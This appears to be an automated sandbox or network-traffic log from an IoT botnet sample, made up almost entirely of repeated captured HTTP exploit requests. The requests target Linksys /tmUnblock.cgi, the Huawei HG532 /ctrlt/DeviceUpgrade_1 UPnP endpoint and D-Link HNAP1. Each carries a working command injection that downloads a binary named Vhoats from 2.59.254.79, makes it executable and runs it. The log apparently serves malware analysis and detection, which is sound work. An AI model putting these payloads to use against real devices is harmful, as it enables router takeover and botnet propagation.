Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 